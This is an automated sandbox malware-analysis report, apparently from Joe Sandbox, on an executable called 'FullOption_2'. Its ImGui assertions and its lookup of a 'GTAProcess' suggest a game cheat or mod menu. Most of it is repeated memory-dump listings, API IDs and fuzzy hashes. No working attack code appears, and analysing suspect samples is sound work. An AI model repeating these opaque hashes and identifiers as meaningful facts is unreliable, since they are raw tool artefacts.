                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: memset$cosfmalloc
                                                                                  • String ID: 33s@
                                                                                  • API String ID: 2754591348-2537142335
                                                                                  • Opcode ID: cc9a4855fcf16fc03f72d67a95222cd8fe06783feaf794aab9ea4c24bdf940a1
                                                                                  • Instruction ID: 7de7f64ab98875f2623570b6994543c4607704c5d26f73a0321c54bffcda9b9e
                                                                                  • Opcode Fuzzy Hash: cc9a4855fcf16fc03f72d67a95222cd8fe06783feaf794aab9ea4c24bdf940a1
                                                                                  • Instruction Fuzzy Hash: 3A62C1B2605BC1AAD30DDF35EA8429AB7A8F755B11F995229D7B403290DF70B1B0CB0D
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF6AE6E92C0: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF6AE6E93FC,?,?,?,?,?,00007FF6AE6E111A), ref: 00007FF6AE6E92FB
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF6AE6E111A), ref: 00007FF6AE6E942E
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF6AE6E111A), ref: 00007FF6AE6E945A
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF6AE6E111A), ref: 00007FF6AE6E98D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$g.CurrentWindow == window$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-1260793299
                                                                                  • Opcode ID: 3576b6217cd01d2248e95fb75b03fc024c14b08f05841680d5da0188707a824a
                                                                                  • Instruction ID: 5d52a81b3fb1d8d02dc715bb3352094140a02df61cce9772001f8b74bb748262
                                                                                  • Opcode Fuzzy Hash: 3576b6217cd01d2248e95fb75b03fc024c14b08f05841680d5da0188707a824a
                                                                                  • Instruction Fuzzy Hash: 0FE10D22D09BC985E6229B3794412B5B760FF7A354F18AB22FE59614F1DF7CF0859B00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$GImGui != 0
                                                                                  • API String ID: 3234217646-4085683301
                                                                                  • Opcode ID: c2e522456e47ab7b40dfced7b0bbb09e9faedf7e36eb1a91bf18fb7eb80c1d0b
                                                                                  • Instruction ID: 05a355340b0ef195aebdc6707ea18fd3e46559f3d108359e20b3f8a0ff0e02cd
                                                                                  • Opcode Fuzzy Hash: c2e522456e47ab7b40dfced7b0bbb09e9faedf7e36eb1a91bf18fb7eb80c1d0b
                                                                                  • Instruction Fuzzy Hash: 49D1E23391AB89C5D712FB379444269B321AF7A384F19EB31EA4D631E1EF28B1959700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertfreemallocmemcpymemmove
                                                                                  • String ID: D:\ALLLLREALSHY\src\$it >= Data && it <= Data + Size
                                                                                  • API String ID: 455179573-3496289388
                                                                                  • Opcode ID: 0394095fe58e920b03b85104bd1fc53dea0dfddc2462ffa6063e4b9bb8b36d21
                                                                                  • Instruction ID: 22ecb4b6d9eed2cb73ddd34545c32a011bb4e1711bf9d4ce1640a2e425cf337c
                                                                                  • Opcode Fuzzy Hash: 0394095fe58e920b03b85104bd1fc53dea0dfddc2462ffa6063e4b9bb8b36d21
                                                                                  • Instruction Fuzzy Hash: CF31B375B06A8681EB549F26E560178B360FF64F89F08E431EA5D97759DE3DE881C300
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size$id == 0
                                                                                  • API String ID: 3234217646-3275336898
                                                                                  • Opcode ID: aef118d756a6a8ddfc173839ae8bc3029f7eea53e745227e24f112b5d8e303d7
                                                                                  • Instruction ID: a662f03c5a8b5fca50eaf2de4fde7d4b697df8225fdd36dee240f1aade6ddee6
                                                                                  • Opcode Fuzzy Hash: aef118d756a6a8ddfc173839ae8bc3029f7eea53e745227e24f112b5d8e303d7
                                                                                  • Instruction Fuzzy Hash: DB41A626B0AA8285EB14AF17E88106D6760FB66784F4C3472EF5DC3B94CF7DE4518744
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: GTAProcess
                                                                                  • API String ID: 881181425-2175359186
                                                                                  • Opcode ID: 43a875b65f6b9c71c428d0a688c88b253962b444e54c99971ee6113ec4b5bc89
                                                                                  • Instruction ID: 541ec5f6c9537511a105bdbf4ba4f2b8f8f2142d7a403a1d197642a53259c877
                                                                                  • Opcode Fuzzy Hash: 43a875b65f6b9c71c428d0a688c88b253962b444e54c99971ee6113ec4b5bc89
                                                                                  • Instruction Fuzzy Hash: 0D31B221A19B8282EA00AB26E44436AA361FB95FB0F445331FABD43AE8DF7CD445C700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: (g.ColorStack.Size > count) && "Calling PopStyleColor() too many times: stack underflow."$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-3842123324
                                                                                  • Opcode ID: cc71a7a876ad4172e943366374970eeb0e21eee023823b6580a9b43acb01156b
                                                                                  • Instruction ID: 3548fb48fa2e74e35ad555d3cecff66227860f4ac638a4eb129fdd615252b137
                                                                                  • Opcode Fuzzy Hash: cc71a7a876ad4172e943366374970eeb0e21eee023823b6580a9b43acb01156b
                                                                                  • Instruction Fuzzy Hash: 2E219935B09EC3C2EB10BF1AD8805B823A1FBA4B44F556575EA0DC7654DF3CD5458710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$Size > 0$g.FocusScopeStack.Size > 0
                                                                                  • API String ID: 3234217646-3744684761
                                                                                  • Opcode ID: 8afb74385ac88aadc270ce8edf10de38fe4ada8b57ff9b194b9b6ec540ed81f0
                                                                                  • Instruction ID: 073a3a41eab64a73ed5a8650f218821ba8c6a504611e4ff3e606c71e07110f59
                                                                                  • Opcode Fuzzy Hash: 8afb74385ac88aadc270ce8edf10de38fe4ada8b57ff9b194b9b6ec540ed81f0
                                                                                  • Instruction Fuzzy Hash: C81182B1E0EA8685F710AF26D8542A833A0FB64745F882475EA0E8A2D4DF7CE585CB14
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassertcosfsinf
                                                                                  • String ID: 0$D:\ALLLLREALSHY\src\$window->BeginCount == 0
                                                                                  • API String ID: 3579902693-2837482890
                                                                                  • Opcode ID: 2b06090bf27db2aec460eb74b2098b0d29860ebc4968772b517fdc8ecbdc242e
                                                                                  • Instruction ID: e6aef0aef180664a97bb26d641eaa0cfc9f553571fda9dc1a24313e01c4eb606
                                                                                  • Opcode Fuzzy Hash: 2b06090bf27db2aec460eb74b2098b0d29860ebc4968772b517fdc8ecbdc242e
                                                                                  • Instruction Fuzzy Hash: FE320632918B8596D312DF37D0812A9B7A0FF6D744F18A721FB48635A5DF38E594DB00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$new_size <= Size$num_clipped_points >= 0
                                                                                  • API String ID: 3234217646-999265005
                                                                                  • Opcode ID: b165d9af7e7928445c5c836d7e6b53682cfcd0fa4186a45ab969da226b4a5b01
                                                                                  • Instruction ID: 918126bcc1527523cc060e1d639ad62fd6da96e88837dd1f96de23660922bcd3
                                                                                  • Opcode Fuzzy Hash: b165d9af7e7928445c5c836d7e6b53682cfcd0fa4186a45ab969da226b4a5b01
                                                                                  • Instruction Fuzzy Hash: F322E633915B888AC312DF3BC4415ADB760FFAD784B19EB16EA19636A0DF38E195D700
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: #CLOSE$#COLLAPSE$D:\ALLLLREALSHY\src\$Size > 0
                                                                                  • API String ID: 3234217646-1583511349
                                                                                  • Opcode ID: 2be7a49d798ac510f261eb2da77cd14e11faba84695293c252b7bb1118f10bbd
                                                                                  • Instruction ID: a94fc820546300d8c254b9a23ad9509fd16030d6765ec4b20776715ee35ad51e
                                                                                  • Opcode Fuzzy Hash: 2be7a49d798ac510f261eb2da77cd14e11faba84695293c252b7bb1118f10bbd
                                                                                  • Instruction Fuzzy Hash: 0DD1F832E15B8985E312DB3384812B973A0EF7E344F18AB32FD18772A1DF39A5919740
                                                                                  APIs
                                                                                  • ceilf.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F4D20
                                                                                  • ceilf.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F4D35
                                                                                  • cosf.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F4E0F
                                                                                  • sinf.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F4E28
                                                                                  • cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6AE6F4ECB
                                                                                  • sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6AE6F4EE3
                                                                                  • ceilf.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6AE6F4FB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ceilf$cosfsinf
                                                                                  • String ID:
                                                                                  • API String ID: 125261001-0
                                                                                  • Opcode ID: 8760a52a2de5c173390043a121240baf7f65381d68dc805df7e5ec018bc9e3ec
                                                                                  • Instruction ID: 6aa9233ff397232f9acc22e1367d51d8c97ed6bc3d7d0ed6d173d8738bb4e360
                                                                                  • Opcode Fuzzy Hash: 8760a52a2de5c173390043a121240baf7f65381d68dc805df7e5ec018bc9e3ec
                                                                                  • Instruction Fuzzy Hash: 72B1ED32E2A68585E212A73B94412B9B350FF7D385F14E732F949B3665DF3CB4D19A00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: D:\ALLLLREALSHY\src\$Size > 0$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-793770333
                                                                                  • Opcode ID: 967da57e35c5d71fa0582377e890d6ba0fad890336e3ba0655678c2cab4cdf67
                                                                                  • Instruction ID: d075cee9a65cb9778210a15f467c4e965eec13975bbafadd21662cb9bf9debf1
                                                                                  • Opcode Fuzzy Hash: 967da57e35c5d71fa0582377e890d6ba0fad890336e3ba0655678c2cab4cdf67
                                                                                  • Instruction Fuzzy Hash: 2BB1F672D19B8586E711DF37948016873A0FFA5784F68B735FB0CA76A9DF28E4909B00
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390615293.00007FF6AEAA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff6ae6d0000_FullOption_2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _wassert
                                                                                  • String ID: Ctx != 0$D:\ALLLLREALSHY\src\$D:\ALLLLREALSHY\src\$i >= 0 && i < Size
                                                                                  • API String ID: 3234217646-3320761818
                                                                                  • Opcode ID: ad6b12ba929a2d1cc9bee1de436bf9cc7ffe0edad3849341605e86d3a452112c
                                                                                  • Instruction ID: bac43641d3291a9a99992dbbe80dfd2a33a930903e28c30483a8e685bc7edf32
                                                                                  • Opcode Fuzzy Hash: ad6b12ba929a2d1cc9bee1de436bf9cc7ffe0edad3849341605e86d3a452112c
                                                                                  • Instruction Fuzzy Hash: 4D513832A1AE8681E721EB37944037973A0EF79744F98A731FA4DA3594DF2CF9858700
                                                                                  APIs
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00007FF6AE6D7DF6,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F02E3
                                                                                  • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F0313
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6AE6D7DF6,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F037D
                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00007FF6AE6D7DF6,?,?,?,00007FF6AE6D7409), ref: 00007FF6AE6F03A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3389721161.00007FF6AE6D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6AE6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3389397401.00007FF6AE6D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389950650.00007FF6AE833000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390089990.00007FF6AE88B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3390566889.00007FF6AEAA2000.00000004.00000001.01000000.00000006.sdmpDownload File
